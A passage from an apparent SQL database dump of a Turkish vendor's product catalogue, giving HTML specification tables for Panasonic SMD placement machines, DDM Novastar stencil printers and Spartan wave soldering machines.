center;\">8,500cph</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Hız (IPC) - Tek Konveyor</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>59,200cph</p>\r\n</td>\r\n<td style=\"text-align: center;\">49,500cph</td>\r\n<td style=\"text-align: center;\">-</td>\r\n<td style=\"text-align: center;\">-</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizilebilen Malzeme Aralığı</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>01005\" chip -</p>\r\n<p>L6xW6xT3mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>01005\" chip -</p>\r\n<p>L12xW12XT6.5mm </p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> 01005\" chip -</p>\r\n<p>L32xW32xT12mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> 0201\" chip -</p>\r\n<p>L100xW90XT28mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizgi Hassasiyeti</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.040 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.040 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> </p>\r\n<p>±0.040 mm/chip</p>\r\n<p> </p>\r\n<p>±0.030 mm/QFP</p>\r\n<p> </p>\r\n<p>±0.050 mm/QFP&lt;12mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Feeder Sayısı</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>120 adet (8mm tape)   </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Şerit Besleyiciler</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>8 - 56mm feeder</p>\r\n</td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: 11px;\">8 - 56mm feeder</span> </td>\r\n<td style=\"text-align: center;\">\r\n<p><span style=\"font-size: 11px;\">8 - 56mm feeder</span> </p>\r\n<p>Stick: Maks. 8 adet</p>\r\n<p>Tray</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p><span style=\"font-size: 11px;\">8 - 104mm feeder</span> </p>\r\n<p>Stick: Maks. 8 adet</p>\r\n<p>Tray</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>Tepsi sabitleyiciler</p>\r\n</td>\r\n<td style=\"text-align: center;\"> </td>\r\n<td style=\"text-align: center;\"> </td>\r\n<td style=\"text-align: center;\"> </td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>W 1280mm x D 2332mm x H 1444mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ağırlık</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>2,470kg (sadece gövde)</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<p style=\"text-align: left;\"> </p>','NPM-W2','','','','npm-w2'),(63,'Maks 38,500cph / Moduler ','<h2><span style=\"text-align: left;\">PANASONIC SMD Dizgi Makinesi (Ultra-Hızlı)</span></h2>\r\n<ul>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum Hız: 38,500cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">16, 12, 8 veya 3 nozzle ile kafa seçenekleri</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Tek gantry kafa sistemi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum 750 x 550mm PCB</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">0.030mm dizgi hassasiyeti</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">01005 ile 100x90mm arası malzemelerin dizgisi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">8 - 104mm feederler + Tray Ünitesi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Gelişmiş MMI</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Modüler ve esnek</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Hızlı ürün dönüşümü</li>\r\n</ul>\r\n<p style=\"text-align: left; margin-left: 30px;\"> </p>\r\n<table id=\"zebra-blue\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p>MODEL ADI</p>\r\n</td>\r\n<td colspan=\"4\">\r\n<p style=\"text-align: center;\"> NM-EJM5E</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Kafa</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>16-nozzle</p>\r\n</td>\r\n<td style=\"text-align: center;\">12-nozzle</td>\r\n<td style=\"text-align: center;\">8-nozzle</td>\r\n<td style=\"text-align: center;\">3-nozzle</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>PCB Boyutları</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>50x50mm - 750 x 550mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Hız (Maks)</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>38,500cph</p>\r\n</td>\r\n<td style=\"text-align: center;\">32,250cph</td>\r\n<td style=\"text-align: center;\">20,800cph</td>\r\n<td style=\"text-align: center;\">6,500cph</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizilebilen Malzeme Aralığı</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>03015\" chip -</p>\r\n<p>L6xW6xT3mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>0402\" chip -</p>\r\n<p>L12xW12XT6.5mm </p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> 0402\" chip -</p>\r\n<p>L32xW32xT12mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> 0603\" chip -</p>\r\n<p>L150xW25XT30mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Dizgi Hassasiyeti</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p> </p>\r\n<p>±0.030 mm/chip</p>\r\n<p> </p>\r\n<p>±0.030 mm/QFP</p>\r\n<p> </p>\r\n<p>±0.050 mm/QFP&lt;12mm</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>±0.030 mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Feeder Sayısı</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>120 adet (8mm tape)   </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Şerit Besleyiciler</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>8 - 56mm feeder</p>\r\n</td>\r\n<td style=\"text-align: center;\"><span style=\"font-size: 11px;\">8 - 56mm feeder</span> </td>\r\n<td style=\"text-align: center;\">\r\n<p><span style=\"font-size: 11px;\">8 - 56mm feeder</span> </p>\r\n<p>Stick: Maks. 8 adet</p>\r\n<p>Tray</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p><span style=\"font-size: 11px;\">8 - 104mm feeder</span> </p>\r\n<p>Stick: Maks. 8 adet</p>\r\n<p>Tray</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Matrix Tray</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>Tepsi sabitleyiciler</p>\r\n</td>\r\n<td style=\"text-align: center;\"> </td>\r\n<td style=\"text-align: center;\"> </td>\r\n<td style=\"text-align: center;\"> </td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>W 1280mm x D 2447mm x H 1444mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ağırlık</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>2,390kg (sadece gövde)</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<p style=\"text-align: left;\"> </p>','NPM-W2S','','','','npm-w2s'),(55,'NPM-VF Odd-Form Inserter','<h2>NPM-VF ODD-FORM INSERTION MACHINE</h2>\r\n<p> </p>\r\n<p> </p>\r\n<table id=\"zebra-blue\">\r\n<tbody>\r\n<tr>\r\n<td>PCB dimensions </td>\r\n<td><span style=\"text-align: start;\">L50mm x W50mm - L510mm x W460mm</span> </td>\r\n</tr>\r\n<tr>\r\n<td>Max. PCB mass</td>\r\n<td>Upto 3kg </td>\r\n</tr>\r\n<tr>\r\n<td>PCB thickness </td>\r\n<td>0.3 - 8mm </td>\r\n</tr>\r\n<tr>\r\n<td>PCB Flow</td>\r\n<td>Left =&gt; Right / Left &lt;= Right </td>\r\n</tr>\r\n<tr>\r\n<td>Insertion direction </td>\r\n<td>360 (+/- 180) degrees </td>\r\n</tr>\r\n<tr>\r\n<td>Insertion push force </td>\r\n<td>Upto 100N </td>\r\n</tr>\r\n<tr>\r\n<td>PCB Exchange time </td>\r\n<td>4.5s </td>\r\n</tr>\r\n<tr>\r\n<td>Applicable components </td>\r\n<td>\r\n<p>Max. dimensions: L130mm x W35mm x H60mm / L150mm x W38mm x H29mm</p>\r\n<p>Max. component mass: 200g </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>3-stations head</td>\r\n<td>\r\n<p>Tact: Max. 0.65s / component</p>\r\n<p>Body chuck + Nozzle + Nozzle</p>\r\n<p>Body chuck + Nozzle + Swing nozzle</p>\r\n<p>Body chuck + Nozzle + Lead chuck</p>\r\n<p>Body chuck + Swing nozzle + Lead chuck</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>2-station head</td>\r\n<td>\r\n<p>Tact: Max. 0.9s / component</p>\r\n<p>Body chuck + Body chuck</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td>Stick</td>\r\n<td>\r\n<p>S =&gt; Max. component dim: W20 x L80 xH20mm / Max. stick width: 24mm /</p>\r\n<p>         Max. component mass of 2kg in total</p>\r\n<p>L =&gt; Max. component dim: W60 x L80 x H45mm / Max. stick width: 64mm /</p>\r\n<p>        Max. component mass of 2kg in total</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Radial Tape</td>\r\n<td>Max. body dimension: Radius = 20mm &amp; H30mm / Lead pitch: 2.5 / 5.0 / 7.5 / 10.0mm </td>\r\n</tr>\r\n<tr>\r\n<td>Tray</td>\r\n<td>Max. tray dimension: L230 xW335 x D69mm / Max. pallets per feeder: 20 / Max. mass: 20kg </td>\r\n</tr>\r\n<tr>\r\n<td>Bulk</td>\r\n<td>Customized specs </td>\r\n</tr>\r\n<tr>\r\n<td>Machine Configuration</td>\r\n<td>\r\n<p>Front: 30-slots</p>\r\n<p>Rear: 30-slot fixed supply</p>\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n</tbody>\r\n</table>','NPM-VF','','','','npm-vf'),(41,'Manuel - 508x432mm','<h2 style=\"text-align: left;\">DDM NOVASTAR - MANUEL SCREEN PRINTER</h2>\r\n<p style=\"text-align: left;\">Masa&uuml;st&uuml; man&uuml;el stencil printer</p>\r\n<ul style=\"text-align: left;\">\r\n<li>X,Y,Z ve theta ayar kontrol&uuml;</li>\r\n<li>Hizalamayı kolaylaştıran ger&ccedil;ek orta noktadan a&ccedil;ı ayarı</li>\r\n<li>G&uuml;venilir ve tekrarlanabilir sonu&ccedil;lar</li>\r\n<li>Z eksenini 4 bağımsız noktadan ayarlama</li>\r\n<li>&Ccedil;ift taraflı baskı ve FoilFrame opsiyonları</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>&Uuml;r&uuml;n Kodu</td>\r\n<td>SPR-20</td>\r\n</tr>\r\n<tr>\r\n<td>Doğrusal Baskı Desteği</td>\r\n<td>Yok</td>\r\n</tr>\r\n<tr>\r\n<td>Tahrikli Baskı Bı&ccedil;akları</td>\r\n<td>Yok</td>\r\n</tr>\r\n<tr>\r\n<td>&Ccedil;ift Baskı Bı&ccedil;ağı</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı A&ccedil;ısı</p>\r\n</td>\r\n<td>\r\n<p>Man&uuml;el</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı Hızı ve G&uuml;c&uuml;</p>\r\n</td>\r\n<td>\r\n<p>Man&uuml;el</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Otomatik &Ccedil;er&ccedil;eve Kaldırma Desteği</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>X &amp; Y Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>12.7mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Z Eksen Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>19mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>A&ccedil;ı Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>Tek Noktadan &plusmn;3&deg;</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Baskı Alanı</p>\r\n</td>\r\n<td>\r\n<p>305x380mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum &Ccedil;er&ccedil;eve Boyutu</p>\r\n</td>\r\n<td>\r\n<p>508x432mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>SMTrue G&ouml;r&uuml;nt&uuml; Desteği</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>FoilFrame Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&Ccedil;ift Y&uuml;zl&uuml; PCB Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Metal Bı&ccedil;ak Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Vakum PCB Tutucu Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>G&uuml;&ccedil; Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Hava Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ağırlık</p>\r\n</td>\r\n<td>\r\n<p>~22.7kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td>\r\n<p>533x711x280mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','SPR-20','','','','spr-20'),(42,'Manuel - 584x584mm','<h2 style=\"text-align: left;\">DDM NOVASTAR - MANUEL SCREEN PRINTER</h2>\r\n<p style=\"text-align: left;\">Masa&uuml;st&uuml; man&uuml;el stencil printer</p>\r\n<ul>\r\n<li style=\"text-align: left;\">Hassas X,Y,Z ve theta ayar kontrol&uuml; ile fine-pitch bask</li>\r\n<li style=\"text-align: left;\">&Ccedil;iftli baskı bı&ccedil;ağı ile rahat ve temiz kullanım</li>\r\n<li style=\"text-align: left;\">Lineer yataklı rulman ile d&uuml;zg&uuml;n baskı hareketi</li>\r\n<li style=\"text-align: left;\">584x584mm &lsquo;ye kadar &ccedil;er&ccedil;eveler i&ccedil;in boyutları ayarlanabilir</li>\r\n<li style=\"text-align: left;\">Piston destekli kolay &ccedil;er&ccedil;eve kaldırma</li>\r\n<li style=\"text-align: left;\">Poli&uuml;retan veya metal bı&ccedil;ak se&ccedil;enekleri</li>\r\n<li style=\"text-align: left;\">PCB vakum tutma, &ccedil;ift taraflı baskı ve FoilFrame opsiyonları</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>&Uuml;r&uuml;n Kodu</td>\r\n<td>\r\n<p>SPR-25</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Doğrusal Baskı Desteği</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Tahrikli Baskı Bı&ccedil;akları</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&Ccedil;ift Baskı Bı&ccedil;ağı</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı A&ccedil;ısı</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı Hızı ve G&uuml;c&uuml;</p>\r\n</td>\r\n<td>\r\n<p>Man&uuml;el</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Otomatik &Ccedil;er&ccedil;eve Kaldırma Desteği</p>\r\n</td>\r\n<td>\r\n<p>Man&uuml;el</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>X &amp; Y Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>12.7mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Z Eksen Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>16mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>A&ccedil;ı Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>&Ccedil;ift Noktadan &plusmn;5&deg;</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Baskı Alanı</p>\r\n</td>\r\n<td>\r\n<p>406x457mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum &Ccedil;er&ccedil;eve Boyutu</p>\r\n</td>\r\n<td>\r\n<p>584x584mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>SMTrue G&ouml;r&uuml;nt&uuml; Desteği</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>FoilFrame Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&Ccedil;ift Y&uuml;zl&uuml; PCB Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Metal Bı&ccedil;ak Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Vakum PCB Tutucu Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>G&uuml;&ccedil; Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Hava Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>Yok</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ağırlık</p>\r\n</td>\r\n<td>\r\n<p>~53.1kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td>\r\n<p>711x838x355mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','SPR-25','','','','spr-20-41'),(43,'Yarı-Otomatik Screen Printer','<h2 style=\"text-align: left;\">DDM NOVASTAR - YARI-OTOMATİK SCREEN PRINTER</h2>\r\n<p style=\"text-align: left;\">Masa&uuml;st&uuml; Yarı-Otomatik stencil printer</p>\r\n<ul>\r\n<li style=\"text-align: left;\">Ayarlanabilir pn&ouml;matik tahrikli baskı bı&ccedil;akları</li>\r\n<li style=\"text-align: left;\">Baskı a&ccedil;ısı ayarlanabilen &ccedil;iftli baskı bı&ccedil;ağı ile rahat ve temiz kullanım</li>\r\n<li style=\"text-align: left;\">Hassas X,Y,Z ve theta ayar kontrol&uuml; ile y&uuml;ksek tekrar edilebilirlik</li>\r\n<li style=\"text-align: left;\">584x584mm &lsquo;ye kadar &ccedil;er&ccedil;eveler i&ccedil;in boyutları ayarlanabilir</li>\r\n<li style=\"text-align: left;\">Piston destekli kolay &ccedil;er&ccedil;eve kaldırma</li>\r\n<li style=\"text-align: left;\">Vakum PCB tutma, &ccedil;ift taraflı baskı ve FoilFrame opsiyonları</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp; 45VA i&ccedil;in;</p>\r\n<ul>\r\n<li style=\"text-align: left;\">SMTrue g&ouml;r&uuml;nt&uuml; desteği 10 kata kadar g&ouml;r&uuml;nt&uuml;y&uuml; b&uuml;y&uuml;terek PCB ve eleğin tam eşleşmesini garantiler</li>\r\n<li style=\"text-align: left;\">0.30mm (12mil) bacak aralıklı malzemeler i&ccedil;in hizalama sağlar</li>\r\n</ul>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\"  cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr >\r\n<td>&Uuml;r&uuml;n Kodu</td>\r\n<td>\r\n<p>SPR-45/45VA</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Doğrusal Baskı Desteği</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Tahrikli Baskı Bı&ccedil;akları</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&Ccedil;ift Baskı Bı&ccedil;ağı</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı A&ccedil;ısı</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ayarlanabilir Baskı Hızı ve G&uuml;c&uuml;</p>\r\n</td>\r\n<td>\r\n<p>Pn&ouml;matik</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Otomatik &Ccedil;er&ccedil;eve Kaldırma Desteği</p>\r\n</td>\r\n<td>\r\n<p>Otomatik</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>X &amp; Y Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>12.7mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Z Eksen Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>16mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>A&ccedil;ı Ayar Aralığı</p>\r\n</td>\r\n<td>\r\n<p>&Ccedil;ift Noktadan &plusmn;5&deg;</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum Baskı Alanı</p>\r\n</td>\r\n<td>\r\n<p>406x457mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Maksimum &Ccedil;er&ccedil;eve Boyutu</p>\r\n</td>\r\n<td>\r\n<p>584x584mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>SMTrue G&ouml;r&uuml;nt&uuml; Desteği</p>\r\n</td>\r\n<td>\r\n<p>Var (SPR-45VA)</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>FoilFrame Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>&Ccedil;ift Y&uuml;zl&uuml; PCB Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Metal Bı&ccedil;ak Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Vakum PCB Tutucu Opsiyonu</p>\r\n</td>\r\n<td>\r\n<p>Var</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>G&uuml;&ccedil; Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>220VAC, 1A</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Hava Bağlantısı</p>\r\n</td>\r\n<td>\r\n<p>5 Bar</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Ağırlık</p>\r\n</td>\r\n<td>\r\n<p>~73kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Boyutlar</p>\r\n</td>\r\n<td>\r\n<p>762x90x406mm</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','SPR-45','','','','spr-20-41-42'),(44,'Masaüstü','<h2 style=\"text-align: left;\">SPARTAN 12S/12D&nbsp;Masa &Uuml;st&uuml;&nbsp;Dalga Lehimleme&nbsp;Makinesi</h2>\r\n<ul>\r\n<li style=\"text-align: left;\">K&uuml;&ccedil;&uuml;k bir alanda tam otomatik bilgisayar kontroll&uuml; lehimleme sistemi</li>\r\n<li style=\"text-align: left;\">M&uuml;kemmel doğruluk ve tekrar edilebilirlik sağlayan gelişmiş teknoloji</li>\r\n<li style=\"text-align: left;\">Tek veya &ccedil;ift dalga se&ccedil;ilebilir</li>\r\n<li style=\"text-align: left;\">Kurşunlu veya kurşunsuz &uuml;retime uygun se&ccedil;ilebilir</li>\r\n<li style=\"text-align: left;\">Kolay kullanım ve bakım</li>\r\n<li style=\"text-align: left;\">Nitrojen opsiyonu</li>\r\n</ul>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>MODEL ADI</td>\r\n<td>SPARTAN 12S</td>\r\n<td>SPARTAN 12D</td>\r\n</tr>\r\n<tr>\r\n<td>Kontrol Sistemi</td>\r\n<td>Novastar Bilgisayar Sistemi</td>\r\n<td>Novastar Bilgisayar Sistemi</td>\r\n</tr>\r\n<tr>\r\n<td>Dalga Genişliği</td>\r\n<td>300mm</td>\r\n<td>300mm</td>\r\n</tr>\r\n<tr>\r\n<td>Dalga Y&uuml;ksekliği</td>\r\n<td>0-10mm</td>\r\n<td>0-10mm</td>\r\n</tr>\r\n<tr>\r\n<td>Konvey&ouml;r Hızı</td>\r\n<td>2000mm/dakika</td>\r\n<td>2000mm/dakika</td>\r\n</tr>\r\n<tr>\r\n<td>&Ouml;nısıtıcı Maks. Sıc. ve G&uuml;c&uuml;</td>\r\n<td>150&ordm;C / 6.00kW</td>\r\n<td>150&ordm;C / 6.00kW</td>\r\n</tr>\r\n<tr>\r\n<td>Lehim Pota Kapasitesi</td>\r\n<td>90kg</td>\r\n<td>170kg</td>\r\n</tr>\r\n<tr>\r\n<td>Pota Maks. Sıcaklığı</td>\r\n<td>300&ordm;C</td>\r\n<td>300&ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Pota Maks. Sıcaklığı (Kurşunsuz)</td>\r\n<td>350&ordm;C</td>\r\n<td>350&ordm;C</td>\r\n</tr>\r\n<tr>\r\n<td>Pota Maksimum G&uuml;c&uuml;</td>\r\n<td>3.6kW</td>\r\n<td>7.2kW</td>\r\n</tr>\r\n<tr>\r\n<td>K&ouml;p&uuml;k Flux Tankı</td>\r\n<td>3 lt</td>\r\n<td>3 lt</td>\r\n</tr>\r\n<tr>\r\n<td>G&uuml;&ccedil; Kaynağı</td>\r\n<td>1 faz - 220VAC&nbsp;</td>\r\n<td>3 faz - 220VAC&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>','Spartan 12S/12D','','','','spartan-8s-8d'),(45,'Masaüstü','<h2>SPARTAN 8S/8D&nbsp;Masa &Uuml;st&uuml;&nbsp;Dalga Lehimleme&nbsp;Makinesi</h2>\r\n<ul text-align: start;\">\r\n<li>K&uuml;&ccedil;&uuml;k bir alanda tam otomatik bilgisayar kontroll&uuml; lehimleme 